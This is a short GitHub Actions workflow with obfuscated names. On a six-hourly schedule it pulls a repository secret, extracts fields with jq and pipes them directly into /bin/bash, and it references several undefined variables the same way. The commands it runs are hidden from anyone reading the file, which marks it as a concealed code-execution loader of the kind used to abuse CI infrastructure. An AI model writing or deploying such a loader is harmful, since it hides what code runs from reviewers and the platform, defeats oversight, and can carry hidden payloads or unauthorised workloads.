name: yupubox
on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yupubox
        env:
          g72: ${{ secrets.g72 }}
        run: |
          echo $g72 | jq -r .zp6099 | /bin/bash
          echo $dyo509 | jq -r .z5 | /bin/bash
          echo $dwc66 | jq -r .fc46 | /bin/bash
          echo $njj234 | jq -r .wfk81 | /bin/bash
          echo $oo345 | jq -r .a33985 | /bin/bash

